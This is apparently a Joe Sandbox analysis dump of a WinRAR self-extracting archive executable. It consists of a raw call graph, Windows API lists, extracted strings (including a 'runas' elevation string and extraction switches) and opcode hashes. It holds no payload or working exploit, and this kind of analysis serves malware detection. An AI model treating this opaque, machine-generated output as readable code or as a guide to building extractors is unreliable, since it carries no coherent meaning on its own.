7ff65a351474 33 API calls 3 library calls 26152->27809 26154->25665 26155->25678 26156->25689 26157->25699 26158->25705 26159->25714 26161 7ff65a3835a0 26160->26161 26161->25718 26162->25633 26164 7ff65a351177 26163->26164 26165 7ff65a352034 33 API calls 26164->26165 26166 7ff65a351185 BuildCatchObjectHelperInternal 26165->26166 26166->25650 26168 7ff65a352085 26167->26168 26170 7ff65a352059 BuildCatchObjectHelperInternal 26167->26170 27810 7ff65a3515b8 33 API calls 3 library calls 26168->27810 26170->25621 26172 7ff65a3822a9 26171->26172 26173 7ff65a37c2d0 26172->26173 26174 7ff65a3824d0 IsProcessorFeaturePresent 26172->26174 26175 7ff65a3824e8 26174->26175 27811 7ff65a3826c4 
RtlCaptureContext RtlLookupFunctionEntry RtlVirtualUnwind 26175->27811 26177 7ff65a3824fb 27812 7ff65a382490 SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 26177->27812 27813 7ff65a3877bc 31 API calls 3 library calls 26180->27813 26182 7ff65a38789d 27814 7ff65a3878b4 16 API calls abort 26182->27814 26185->25671 26186->25741 26187->25764 26188->25779 26189->25791 26215 7ff65a363de8 26190->26215 26194 7ff65a36a549 26221 7ff65a3693c8 26194->26221 26195 7ff65a36a4d9 26195->26194 26213 7ff65a36a52a SetDlgItemTextW 26195->26213 26236 7ff65a3697c0 26195->26236 26198 7ff65a36a6b2 GetSystemMetrics GetWindow 26200 7ff65a36a6dd 26198->26200 26201 7ff65a36a7e1 26198->26201 26199 7ff65a36a5c3 26202 7ff65a36a5cc GetWindowLongPtrW 26199->26202 26203 7ff65a36a682 26199->26203 26200->26201 26212 7ff65a36a6fe GetWindowRect 26200->26212 26214 7ff65a36a7c0 GetWindow 26200->26214 26204 7ff65a3822a0 _handle_error 8 API calls 26201->26204 26205 7ff65a3be2c0 26202->26205 26240 7ff65a369568 26203->26240 26209 7ff65a36a7f0 26204->26209 26210 7ff65a36a66a GetWindowRect 26205->26210 26209->25804 26210->26203 26211 7ff65a36a6a5 SetDlgItemTextW 26211->26198 26212->26200 26213->26195 26214->26200 26214->26201 26216 7ff65a363e0d swprintf 26215->26216 26249 7ff65a389e70 26216->26249 26219 7ff65a370ee8 WideCharToMultiByte 26220 7ff65a370f2a 26219->26220 26220->26195 26222 7ff65a369568 47 API calls 26221->26222 26226 7ff65a36940f 26222->26226 26223 7ff65a36951a 26224 7ff65a3822a0 _handle_error 8 API calls 26223->26224 26225 7ff65a36954e GetWindowRect GetClientRect 26224->26225 26225->26198 26225->26199 26226->26223 26227 7ff65a35129c 33 API calls 26226->26227 26228 7ff65a36945c 26227->26228 26229 7ff65a35129c 33 API calls 26228->26229 26235 7ff65a369561 26228->26235 26232 7ff65a3694d4 26229->26232 26230 7ff65a387884 _invalid_parameter_noinfo_noreturn 31 API calls 26231 7ff65a369567 26230->26231 26232->26223 26233 7ff65a36955c 26232->26233 26234 7ff65a387884 
_invalid_parameter_noinfo_noreturn 31 API calls 26233->26234 26234->26235 26235->26230 26237 7ff65a369829 26236->26237 26238 7ff65a369800 26236->26238 26237->26195 26288 7ff65a38a1f0 31 API calls 2 library calls 26238->26288 26241 7ff65a363de8 swprintf 46 API calls 26240->26241 26242 7ff65a3695ab 26241->26242 26243 7ff65a370ee8 WideCharToMultiByte 26242->26243 26244 7ff65a3695c3 26243->26244 26245 7ff65a3697c0 31 API calls 26244->26245 26246 7ff65a3695db 26245->26246 26247 7ff65a3822a0 _handle_error 8 API calls 26246->26247 26248 7ff65a3695eb 26247->26248 26248->26198 26248->26211 26250 7ff65a389ece 26249->26250 26251 7ff65a389eb6 26249->26251 26250->26251 26253 7ff65a389ed8 26250->26253 26276 7ff65a38d61c 15 API calls _set_errno_from_matherr 26251->26276 26278 7ff65a387e70 35 API calls 2 library calls 26253->26278 26254 7ff65a389ebb 26277 7ff65a387864 31 API calls _invalid_parameter_noinfo 26254->26277 26257 7ff65a389ee9 __scrt_get_show_window_mode 26279 7ff65a387df0 15 API calls _set_errno_from_matherr 26257->26279 26258 7ff65a3822a0 _handle_error 8 API calls 26259 7ff65a363e29 26258->26259 26259->26219 26261 7ff65a389f54 26280 7ff65a388278 46 API calls 3 library calls 26261->26280 26263 7ff65a389f5d 26264 7ff65a389f94 26263->26264 26265 7ff65a389f65 26263->26265 26267 7ff65a389fec 26264->26267 26268 7ff65a38a012 26264->26268 26269 7ff65a389fa3 26264->26269 26272 7ff65a389f9a 26264->26272 26281 7ff65a38d88c 26265->26281 26273 7ff65a38d88c __free_lconv_mon 15 API calls 26267->26273 26268->26267 26270 7ff65a38a01c 26268->26270 26271 7ff65a38d88c __free_lconv_mon 15 API calls 26269->26271 26274 7ff65a38d88c __free_lconv_mon 15 API calls 26270->26274 26275 7ff65a389ec6 26271->26275 26272->26267 26272->26269 26273->26275 26274->26275 26275->26258 26276->26254 26277->26275 26278->26257 26279->26261 26280->26263 26282 7ff65a38d891 RtlRestoreThreadPreferredUILanguages 26281->26282 26286 7ff65a38d8c1 __free_lconv_mon 26281->26286 26283 7ff65a38d8ac 26282->26283 
26282->26286 26287 7ff65a38d61c 15 API calls _set_errno_from_matherr 26283->26287 26285 7ff65a38d8b1 GetLastError 26285->26286 26286->26275 26287->26285 26288->26237 26301 7ff65a3513a4 26289->26301 26292 7ff65a352494 26293 7ff65a35129c 33 API calls 26292->26293 26294 7ff65a3524a2 26293->26294 26295 7ff65a3524dd 26294->26295 26298 7ff65a352505 26294->26298 26296 7ff65a3822a0 _handle_error 8 API calls 26295->26296 26297 7ff65a3524f3 26296->26297 26297->25813 26299 7ff65a387884 _invalid_parameter_noinfo_noreturn 31 API calls 26298->26299 26300 7ff65a35250a 26299->26300 26302 7ff65a35142d GetWindowTextW 26301->26302 26303 7ff65a3513ad 26301->26303 26302->26292 26304 7ff65a35143d 26303->26304 26305 7ff65a3513ce 26303->26305 26321 7ff65a352018 33 API calls std::_Xinvalid_argument 26304->26321 26309 7ff65a3513db __scrt_get_show_window_mode 26305->26309 26311 7ff65a382150 26305->26311 26320 7ff65a35197c 31 API calls _invalid_parameter_noinfo_noreturn 26309->26320 26312 7ff65a38215b 26311->26312 26313 7ff65a382174 26312->26313 26315 7ff65a38217a 26312->26315 26322 7ff65a38bb40 26312->26322 26313->26309 26316 7ff65a382185 26315->26316 26325 7ff65a382efc RtlPcToFileHeader RaiseException std::bad_alloc::bad_alloc std::_Xinvalid_argument 26315->26325 26326 7ff65a351f80 33 API calls 3 library calls 26316->26326 26319 7ff65a38218b 26320->26302 26327 7ff65a38bb80 26322->26327 26325->26316 26326->26319 26332 7ff65a38f318 EnterCriticalSection 26327->26332 26333->25823 26335->25838 26343 7ff65a3695f8 26336->26343 26339 7ff65a369799 26341 7ff65a3822a0 _handle_error 8 API calls 26339->26341 26340 7ff65a3697c0 31 API calls 26340->26339 26342 7ff65a3697b2 26341->26342 26342->25850 26342->25851 26344 7ff65a3696f0 26343->26344 26345 7ff65a369652 26343->26345 26346 7ff65a3822a0 _handle_error 8 API calls 26344->26346 26347 7ff65a370ee8 WideCharToMultiByte 26345->26347 26349 7ff65a369680 26345->26349 26348 7ff65a369724 26346->26348 26347->26349 26348->26339 26348->26340 26352 7ff65a3696af 
26349->26352 26353 7ff65a36aa48 45 API calls 2 library calls 26349->26353 26354 7ff65a38a1f0 31 API calls 2 library calls 26352->26354 26353->26352 26354->26344 26371 7ff65a36d44c 26355->26371 26359 7ff65a36d861 swprintf 26360 7ff65a389e70 swprintf 46 API calls 26359->26360 26368 7ff65a36d8f0 26359->26368 26385 7ff65a359d78 33 API calls 26359->26385 26360->26359 26361 7ff65a36d91f 26363 7ff65a36d993 26361->26363 26366 7ff65a36d9bb 26361->26366 26364 7ff65a3822a0 _handle_error 8 API calls 26363->26364 26365 7ff65a36d9a7 26364->26365 26365->25856 26367 7ff65a387884 _invalid_parameter_noinfo_noreturn 31 API calls 26366->26367 26369 7ff65a36d9c0 26367->26369 26368->26361 26386 7ff65a359d78 33 API calls 26368->26386 26372 7ff65a36d5e1 26371->26372 26373 7ff65a36d47e 26371->26373 26375 7ff65a36cb3c 26372->26375 26373->26372 26374 7ff65a351744 33 API calls 26373->26374 26374->26373 26376 7ff65a36cb72 26375->26376 26383 7ff65a36cc3c 26375->26383 26379 7ff65a36cbdc 26376->26379 26380 7ff65a36cc37 26376->26380 26382 7ff65a36cb82 26376->26382 26379->26382 26384 7ff65a382150 33 API calls 26379->26384 26387 7ff65a351f80 33 API calls 3 library calls 26380->26387 26382->26359 26388 7ff65a352004 33 API calls std::_Xinvalid_argument 26383->26388 26384->26382 26385->26359 26386->26361 26387->26383 26390 7ff65a37adbc GetMessageW 26389->26390 26391 7ff65a37ae00 GetDlgItem 26389->26391 26392 7ff65a37addb IsDialogMessageW 26390->26392 26393 7ff65a37adea TranslateMessage DispatchMessageW 26390->26393 26391->25859 26391->25862 26392->26391 26392->26393 26393->26391 26396 7ff65a363673 26394->26396 26395 7ff65a3636a0 26414 7ff65a36327c 26395->26414 26396->26395 26397 7ff65a36368c CreateDirectoryW 26396->26397 26397->26395 26399 7ff65a36373d 26397->26399 26403 7ff65a36374d 26399->26403 26501 7ff65a363cf4 26399->26501 26401 7ff65a363751 GetLastError 26401->26403 26405 7ff65a3822a0 _handle_error 8 API calls 26403->26405 26407 7ff65a363779 26405->26407 26407->25873 26408 7ff65a3636fb 26410 
7ff65a363734 26408->26410 26411 7ff65a36378e 26408->26411 26409 7ff65a3636e0 CreateDirectoryW 26409->26408 26410->26399 26410->26401 26412 7ff65a387884 _invalid_parameter_noinfo_noreturn 31 API calls 26411->26412 26413 7ff65a363793 26412->26413 26415 7ff65a3632a7 GetFileAttributesW 26414->26415 26416 7ff65a3632a4 26414->26416 26417 7ff65a3632b8 26415->26417 26424 7ff65a363335 26415->26424 26416->26415 26419 7ff65a3669cc 49 API calls 26417->26419 26418 7ff65a3822a0 _handle_error 8 API calls 26421 7ff65a363349 26418->26421 26420 7ff65a3632df 26419->26420 26422 7ff65a3632fc 26420->26422 26423 7ff65a3632e3 GetFileAttributesW 26420->26423 26421->26401 26428 7ff65a3669cc 26421->26428 26422->26424 26425 7ff65a363359 26422->26425 26423->26422 26424->26418 26426 7ff65a387884 _invalid_parameter_noinfo_noreturn 31 API calls 26425->26426 26427 7ff65a36335e 26426->26427 26429 7ff65a366a0b 26428->26429 26443 7ff65a366a04 26428->26443 26431 7ff65a35129c 33 API calls 26429->26431 26430 7ff65a3822a0 _handle_error 8 API calls 26432 7ff65a3636dc 26430->26432 26433 7ff65a366a36 26431->26433 26432->26408 26432->26409 26434 7ff65a366c87 26433->26434 26435 7ff65a366a56 26433->26435 26436 7ff65a36629c 35 API calls 26434->26436 26437 7ff65a366a70 26435->26437 26462 7ff65a366b09 26435->26462 26441 7ff65a366ca6 26436->26441 26438 7ff65a36706b 26437->26438 26515 7ff65a35c0a8 33 API calls 2 library calls 26437->26515 26535 7ff65a352004 33 API calls std::_Xinvalid_argument 26438->26535 26440 7ff65a366eaf 26445 7ff65a36708f 26440->26445 26532 7ff65a35c0a8 33 API calls 2 library calls 26440->26532 26441->26440 26446 7ff65a366cdb 26441->26446 26498 7ff65a366b04 26441->26498 26442 7ff65a367071 26452 7ff65a387884 _invalid_parameter_noinfo_noreturn 31 API calls 26442->26452 26443->26430 26538 7ff65a352004 33 API calls std::_Xinvalid_argument 26445->26538 26451 7ff65a36707d 26446->26451 26518 7ff65a35c0a8 33 API calls 2 library calls 26446->26518 26447 7ff65a367095 26453 7ff65a387884 
_invalid_parameter_noinfo_noreturn 31 API calls 26447->26453 26449 7ff65a366ac3 26463 7ff65a351fa0 31 API calls 26449->26463 26467 7ff65a366ad5 BuildCatchObjectHelperInternal 26449->26467 26536 7ff65a352004 33 API calls std::_Xinvalid_argument 26451->26536 26460 7ff65a367077 26452->26460 26461 7ff65a36709b 26453->26461 26454 7ff65a367066 26459 7ff65a387884 _invalid_parameter_noinfo_noreturn 31 API calls 26454->26459 26455 7ff65a366f16 26533 7ff65a3511cc 33 API calls BuildCatchObjectHelperInternal 26455->26533 26458 7ff65a351fa0 31 API calls 26458->26498 26459->26438 26470 7ff65a387884 _invalid_parameter_noinfo_noreturn 31 API calls 26460->26470 26472 7ff65a387884 _invalid_parameter_noinfo_noreturn 31 API calls 26461->26472 26466 7ff65a35129c 33 API calls 26462->26466 26462->26498 26463->26467 26465 7ff65a367083 26469 7ff65a387884 _invalid_parameter_noinfo_noreturn 31 API calls 26465->26469 26473 7ff65a366b7e 26466->26473 26467->26458 26468 7ff65a366f29 26534 7ff65a36576c 33 API calls BuildCatchObjectHelperInternal 26468->26534 26475 7ff65a367089 26469->26475 26470->26451 26471 7ff65a351fa0 31 API calls 26483 7ff65a366db5 26471->26483 26477 7ff65a3670a1 26472->26477 26516 7ff65a3657e0 33 API calls 26473->26516 26537 7ff65a35704c 47 API calls BuildCatchObjectHelperInternal 26475->26537 26476 7ff65a366d36 BuildCatchObjectHelperInternal 26476->26465 26476->26471 26479 7ff65a366b93 26517 7ff65a35e174 33 API calls 2 library calls 26479->26517 26482 7ff65a351fa0 31 API calls 26485 7ff65a366fac 26482->26485 26487 7ff65a366de1 26483->26487 26519 7ff65a351744 26483->26519 26484 7ff65a366f39 BuildCatchObjectHelperInternal 26484->26461 26484->26482 26486 7ff65a351fa0 31 API calls 26485->26486 26490 7ff65a366fb6 26486->26490 26487->26475 26491 7ff65a35129c 33 API calls 26487->26491 26489 7ff65a351fa0 31 API calls 26493 7ff65a366c2d 26489->26493 26494 7ff65a351fa0 31 API calls 26490->26494 26495 7ff65a366e82 26491->26495 26492 7ff65a366ba9 BuildCatchObjectHelperInternal 
26492->26460 26492->26489 26496 7ff65a351fa0 31 API calls 26493->26496 26494->26498 26497 7ff65a352034 33 API calls 26495->26497 26496->26498 26499 7ff65a366e9f 26497->26499 26498->26442 26498->26443 26498->26447 26498->26454 26500 7ff65a351fa0 31 API calls 26499->26500 26500->26498 26502 7ff65a363d1b 26501->26502 26503 7ff65a363d1e SetFileAttributesW 26501->26503 26502->26503 26504 7ff65a363d34 26503->26504 26511 7ff65a363db5 26503->26511 26506 7ff65a3669cc 49 API calls 26504->26506 26505 7ff65a3822a0 _handle_error 8 API calls 26507 7ff65a363dca 26505->26507 26508 7ff65a363d59 26506->26508 26507->26403 26509 7ff65a363d5d SetFileAttributesW 26508->26509 26510 7ff65a363d7c 26508->26510 26509->26510 26510->26511 26512 7ff65a363dda 26510->26512 26511->26505 26513 7ff65a387884 _invalid_parameter_noinfo_noreturn 31 API calls 26512->26513 26514 7ff65a363ddf 26513->26514 26515->26449 26516->26479 26517->26492 26518->26476 26520 7ff65a3518a1 26519->26520 26523 7ff65a351784 26519->26523 26539 7ff65a352004 33 API calls std::_Xinvalid_argument 26520->26539 26522 7ff65a3518a7 26540 7ff65a351f80 33 API calls 3 library calls 26522->26540 26523->26522 26527 7ff65a382150 33 API calls 26523->26527 26530 7ff65a3517ac BuildCatchObjectHelperInternal 26523->26530 26525 7ff65a3518ad 26541 7ff65a3834cc 31 API calls __std_exception_copy 26525->26541 26527->26530 26528 7ff65a3518d9 26528->26487 26529 7ff65a351859 BuildCatchObjectHelperInternal 26529->26487 26530->26529 26531 7ff65a387884 _invalid_parameter_noinfo_noreturn 31 API calls 26530->26531 26531->26520 26532->26455 26533->26468 26534->26484 26537->26445 26540->26525 26541->26528 26543 7ff65a35713b 26542->26543 26544 7ff65a357206 26542->26544 26550 7ff65a35714b BuildCatchObjectHelperInternal 26543->26550 26551 7ff65a353f48 33 API calls 2 library calls 26543->26551 26552 7ff65a35704c 47 API calls BuildCatchObjectHelperInternal 26544->26552 26547 7ff65a357273 26547->25894 26548 7ff65a35720b 26548->26547 26553 7ff65a35889c 8 API calls 
BuildCatchObjectHelperInternal 26548->26553 26550->25894 26551->26550 26552->26548 26553->26548 26555 7ff65a3622c3 26554->26555 26556 7ff65a3622af 26554->26556 26555->25917 26556->26555 26557 7ff65a362090 100 API calls 26556->26557 26557->26555 26559 7ff65a3620aa 26558->26559 26561 7ff65a3620c2 26558->26561 26559->26561 26562 7ff65a3620b6 FindCloseChangeNotification 26559->26562 26560 7ff65a3620e6 26560->25917 26561->26560 26564 7ff65a35b554 99 API calls 26561->26564 26562->26561 26564->26560 26566 7ff65a37a9af 26565->26566 26567 7ff65a37a9b6 26565->26567 26566->26072 26567->26566 26568 7ff65a351744 33 API calls 26567->26568 26568->26567 26569->26072 26576 7ff65a37f4a9 __scrt_get_show_window_mode 26570->26576 26585 7ff65a37f7fd 26570->26585 26571 7ff65a351fa0 31 API calls 26572 7ff65a37f81c 26571->26572 26573 7ff65a3822a0 _handle_error 8 API calls 26572->26573 26574 7ff65a37f828 26573->26574 26574->26016 26575 7ff65a37f604 26578 7ff65a35129c 33 API calls 26575->26578 26576->26575 26667 7ff65a371344 CompareStringW 26576->26667 26579 7ff65a37f640 26578->26579 26580 7ff65a363268 51 API calls 26579->26580 26581 7ff65a37f64a 26580->26581 26582 7ff65a351fa0 31 API calls 26581->26582 26586 7ff65a37f655 26582->26586 26583 7ff65a37f6c2 ShellExecuteExW 26584 7ff65a37f7c6 26583->26584 26591 7ff65a37f6d5 26583->26591 26584->26585 26589 7ff65a37f87b 26584->26589 26585->26571 26586->26583 26588 7ff65a35129c 33 API calls 26586->26588 26587 7ff65a37f70e 26669 7ff65a37fda4 PeekMessageW GetMessageW TranslateMessage DispatchMessageW WaitForSingleObject 26587->26669 26592 7ff65a37f697 26588->26592 26594 7ff65a387884 _invalid_parameter_noinfo_noreturn 31 API calls 26589->26594 26590 7ff65a37f763 CloseHandle 26595 7ff65a37f781 26590->26595 26596 7ff65a37f772 26590->26596 26591->26587 26591->26590 26601 7ff65a37f701 ShowWindow 26591->26601 26668 7ff65a365b20 53 API calls 2 library calls 26592->26668 26599 7ff65a37f880 26594->26599 26595->26584 26605 7ff65a37f7b7 ShowWindow 26595->26605 
26670 7ff65a371344 CompareStringW 26596->26670 26598 7ff65a37f6a5 26603 7ff65a351fa0 31 API calls 26598->26603 26601->26587 26602 7ff65a37f726 26602->26590 26606 7ff65a37f734 GetExitCodeProcess 26602->26606 26604 7ff65a37f6af 26603->26604 26604->26583 26605->26584 26606->26590 26607 7ff65a37f747 26606->26607 26607->26590 26608->26072 26609->26072 26610->26072 26611->26072 26612->26072 26613->26072 26614->26004 26615->26072 26616->26072 26617->26072 26618->26072 26620 7ff65a3672aa 26619->26620 26671 7ff65a35b3b8 26620->26671 26624 7ff65a3631a7 DeleteFileW 26623->26624 26625 7ff65a3631a4 26623->26625 26626 7ff65a3631bd 26624->26626 26627 7ff65a36323c 26624->26627 26625->26624 26629 7ff65a3669cc 49 API calls 26626->26629 26628 7ff65a3822a0 _handle_error 8 API calls 26627->26628 26630 7ff65a363251 26628->26630 26631 7ff65a3631e2 26629->26631 26630->26072 26632 7ff65a3631e6 DeleteFileW 26631->26632 26633 7ff65a363203 26631->26633 26632->26633 26633->26627 26634 7ff65a363261 26633->26634 26635 7ff65a387884 _invalid_parameter_noinfo_noreturn 31 API calls 26634->26635 26636 7ff65a363266 26635->26636 26638->26072 26639->26072 26640->26072 26641->26072 26643 7ff65a367dcc 26642->26643 26644 7ff65a367de3 26643->26644 26645 7ff65a367e15 26643->26645 26647 7ff65a35129c 33 API calls 26644->26647 26675 7ff65a35704c 47 API calls BuildCatchObjectHelperInternal 26645->26675 26649 7ff65a367e07 26647->26649 26648 7ff65a367e1a 26649->26072 26650->26072 26651->26072 26654 7ff65a36d21a 26652->26654 26653 7ff65a36d24d 26653->26064 26654->26653 26655 7ff65a351744 33 API calls 26654->26655 26655->26654 26656->25962 26657->25952 26659->25931 26660->25934 26661->25937 26662->25992 26663->25979 26665->25981 26667->26575 26668->26598 26669->26602 26670->26595 26674 7ff65a35b402 __scrt_get_show_window_mode 26671->26674 26672 7ff65a3822a0 _handle_error 8 API calls 26673 7ff65a35b4c6 26672->26673 26673->26072 26674->26672 26675->26648 26710 7ff65a3686ac 26676->26710 26678 7ff65a35e3d4 26716 
7ff65a387884 _invalid_parameter_noinfo_noreturn 31 API calls 28187->28190 28189 7ff65a3699e2 28188->28189 28196 7ff65a369a6d 28188->28196 28192 7ff65a362004 100 API calls 28189->28192 28193 7ff65a36a3fa 28190->28193 28191 7ff65a369ad7 28244 7ff65a38a3d0 28191->28244 28194 7ff65a3699eb 28192->28194 28194->28187 28197 7ff65a369a26 28194->28197 28196->28191 28202 7ff65a368e18 33 API calls 28196->28202 28200 7ff65a3822a0 _handle_error 8 API calls 28197->28200 28199 7ff65a38a3d0 31 API calls 28213 7ff65a369b17 __vcrt_FlsAlloc 28199->28213 28201 7ff65a36a3ce 28200->28201 28201->28127 28202->28196 28203 7ff65a369c49 28204 7ff65a362a60 101 API calls 28203->28204 28216 7ff65a369d1c 28203->28216 28207 7ff65a369c61 28204->28207 28205 7ff65a362b70 101 API calls 28205->28213 28206 7ff65a362890 104 API calls 28206->28213 28208 7ff65a362890 104 API calls 28207->28208 28207->28216 28214 7ff65a369c89 28208->28214 28209 7ff65a362004 100 API calls 28211 7ff65a36a3b5 28209->28211 28210 7ff65a362a60 101 API calls 28210->28213 28212 7ff65a351fa0 31 API calls 28211->28212 28212->28197 28213->28203 28213->28205 28213->28206 28213->28210 28213->28216 28214->28216 28237 7ff65a369c97 __vcrt_FlsAlloc 28214->28237 28253 7ff65a370b3c MultiByteToWideChar 28214->28253 28216->28209 28217 7ff65a36a1ac 28227 7ff65a36a282 28217->28227 28259 7ff65a38cf10 31 API calls 2 library calls 28217->28259 28219 7ff65a36a117 28219->28217 28256 7ff65a38cf10 31 API calls 2 library calls 28219->28256 28222 7ff65a36a10b 28222->28127 28223 7ff65a36a26e 28223->28227 28261 7ff65a368c90 33 API calls 2 library calls 28223->28261 28224 7ff65a36a209 28260 7ff65a38b73c 31 API calls _invalid_parameter_noinfo_noreturn 28224->28260 28225 7ff65a36a362 28226 7ff65a38a3d0 31 API calls 28225->28226 28230 7ff65a36a38b 28226->28230 28227->28225 28228 7ff65a368e18 33 API calls 28227->28228 28228->28227 28232 7ff65a38a3d0 31 API calls 28230->28232 28231 7ff65a36a12d 28257 7ff65a38b73c 31 API calls _invalid_parameter_noinfo_noreturn 
28231->28257 28232->28216 28234 7ff65a36a198 28234->28217 28258 7ff65a368c90 33 API calls 2 library calls 28234->28258 28235 7ff65a370ee8 WideCharToMultiByte 28235->28237 28237->28216 28237->28217 28237->28219 28237->28222 28237->28235 28238 7ff65a36a3e9 28237->28238 28254 7ff65a36aa48 45 API calls 2 library calls 28237->28254 28255 7ff65a38a1f0 31 API calls 2 library calls 28237->28255 28262 7ff65a3825a4 8 API calls 28238->28262 28243 7ff65a36a428 28242->28243 28243->28129 28245 7ff65a38a3fd 28244->28245 28251 7ff65a38a412 28245->28251 28263 7ff65a38d61c 15 API calls _set_errno_from_matherr 28245->28263 28247 7ff65a38a407 28264 7ff65a387864 31 API calls _invalid_parameter_noinfo 28247->28264 28249 7ff65a3822a0 _handle_error 8 API calls 28250 7ff65a369af7 28249->28250 28250->28199 28251->28249 28252->28181 28253->28237 28254->28237 28255->28237 28256->28231 28257->28234 28258->28217 28259->28224 28260->28223 28261->28227 28262->28183 28263->28247 28264->28251 28290 7ff65a380d75 14 API calls _com_raise_error
                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1706410601.00007FF65A351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF65A350000, based on PE: true
                                      • Associated: 00000000.00000002.1706390063.00007FF65A350000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1706459487.00007FF65A398000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1706484541.00007FF65A3AB000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1706484541.00007FF65A3B4000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1706525295.00007FF65A3BA000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1706525295.00007FF65A3BE000.00000002.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_7ff65a350000_file.jbxd
                                      Similarity
                                      • API ID: Item$_invalid_parameter_noinfo_noreturn$Message$DialogText$ButtonChecked$FileSend$ErrorLast$CloseFindFocusLoadStringView$CommandConcurrency::cancel_current_taskCountCreateDispatchEnableExecuteFirstHandleLineMappingParamShellSleepTickTranslateUnmapWindow
                                      • String ID: %s %s$-el -s2 "-d%s" "-sp%s"$@$LICENSEDLG$REPLACEFILEDLG$STARTDLG$__tmp_rar_sfx_access_check_$p$runas$winrarsfxmappingfile.tmp
                                      • API String ID: 3303814210-2702805183
                                      • Opcode ID: d1df558db1793713a62bc4f13a1729d6542dfbd792ff814912b0ac4e491caeb1
                                      • Instruction ID: 0bb91e49a06da336ee01bf3fcd9cc9746c02c66bc5736640e93311e7af58bbc2
                                      • Opcode Fuzzy Hash: d1df558db1793713a62bc4f13a1729d6542dfbd792ff814912b0ac4e491caeb1
                                      • Instruction Fuzzy Hash: 8FD2D322E09B8781FA20DF64E8502F96761EF85788F5842B5D94DE77A6EF3CE644C700
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                      Strings
                                      Similarity
                                      • API ID: _invalid_parameter_noinfo_noreturn$Concurrency::cancel_current_task$ButtonCheckedFileMove$DialogItemPathTemp
                                      • String ID: .lnk$.tmp$<br>$@set:user$HIDE$MAX$MIN$ProgramFilesDir$Software\Microsoft\Windows\CurrentVersion$lnk
                                      • API String ID: 1830998149-3916287355
                                      • Opcode ID: 264cb41524a0a5fc932b712193b35318942710b9b8aa49385f8dc84018ce549e
                                      • Instruction ID: 687a6c8cd1b89bda3f0d698785f09dd00f429cadc8749db3bd6f2a81305ac1a0
                                      • Opcode Fuzzy Hash: 264cb41524a0a5fc932b712193b35318942710b9b8aa49385f8dc84018ce549e
                                      • Instruction Fuzzy Hash: FF139D62B04B82D9EB10DF64D8802EC27A1EF4479CF581676DA1DE7AD9DF38E685C340
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Control-flow Graph

                                      APIs
                                      Strings
                                      Similarity
                                      • API ID: File$EnvironmentHandleVariableView$_invalid_parameter_noinfo_noreturn$AddressCloseCurrentDeleteDirectoryModuleObjectProcUnmap$CommandDialogIconInitializeLineLoadLocalMallocMappingOpenParamSleepTimeswprintf
                                      • String ID: %4d-%02d-%02d-%02d-%02d-%02d-%03d$STARTDLG$sfxname$sfxstime$winrarsfxmappingfile.tmp
                                      • API String ID: 1048086575-3710569615
                                      • Opcode ID: 629b10c3665e344ee684b2b55b89b65b3a0894402e96aef3b0bef22df42a097a
                                      • Instruction ID: 0d5b60ff3745ddd7b3a7faa39a59e8ced17cdbcbad20b0dd60b34c9627788e5c
                                      • Opcode Fuzzy Hash: 629b10c3665e344ee684b2b55b89b65b3a0894402e96aef3b0bef22df42a097a
                                      • Instruction Fuzzy Hash: F512A131E19B8785EB10DF28E8452B96361FF85788F5842B5DA9DE7AA5EF3CE144C300
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Control-flow Graph

                                      APIs
                                      Strings
                                      Similarity
                                      • API ID: Window$Rect$ItemText$ByteCharClientLongMetricsMultiSystemWideswprintf
                                      • String ID: $%s:$CAPTION
                                      • API String ID: 1936833115-404845831
                                      • Opcode ID: f09754ff845102ccda79200273466886b6e7de95add5815e5c6e323da895e5c6
                                      • Instruction ID: 2a04ca3f7cba239222099334720e5eb17df812be99aaf397e8c043911bdd3b2d
                                      • Opcode Fuzzy Hash: f09754ff845102ccda79200273466886b6e7de95add5815e5c6e323da895e5c6
                                      • Instruction Fuzzy Hash: BE91F532B1865286E718DF29F80066A67A1FF84788F585535EE4EE7B58DF3CE805CB00
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Control-flow Graph

                                      APIs
                                      Strings
                                      Similarity
                                      • API ID: GlobalResource$AllocGdipLock$BitmapCreateFindFreeFromLoadSizeofUnlock
                                      • String ID: PNG
                                      • API String ID: 541704414-364855578
                                      • Opcode ID: fd8ee907c37a37ea721c4e5c6a3baa4bdc4dc7e79f3e600676f8c4fa2d46fae9
                                      • Instruction ID: def128fe6a74b349f6939d8a92f71fd5a92076f1db7cef3f6fbc74ad92672810
                                      • Opcode Fuzzy Hash: fd8ee907c37a37ea721c4e5c6a3baa4bdc4dc7e79f3e600676f8c4fa2d46fae9
                                      • Instruction Fuzzy Hash: 13414C21A09B4686EF148F56E544379ABA0AF88B98F1C04B5CE4ED73A4EF7CE5498300
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                      Strings
                                      Similarity
                                      • API ID: _invalid_parameter_noinfo_noreturn
                                      • String ID: __tmp_reference_source_
                                      • API String ID: 3668304517-685763994
                                      • Opcode ID: 214bf20a8b03f5f16f094fffc1da824657209fc8bfb2e438ce670c08401f05ec
                                      • Instruction ID: e0462518b49d23aa8a461543fc264c002390627f98d7c7b8fdd95458855f23f7
                                      • Opcode Fuzzy Hash: 214bf20a8b03f5f16f094fffc1da824657209fc8bfb2e438ce670c08401f05ec
                                      • Instruction Fuzzy Hash: 48D2A762A086C292EA64CB65E1413FE67A1FF45788F4841B2DB9DE37A5DF3CE454C700
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                      Strings
                                      Similarity
                                      • API ID: _invalid_parameter_noinfo_noreturn
                                      • String ID: CMT
                                      • API String ID: 3668304517-2756464174
                                      • Opcode ID: c0c8aba76357acd8a73ae7fdd4341b15dbe5ae0ad7cd8641e383336613531407
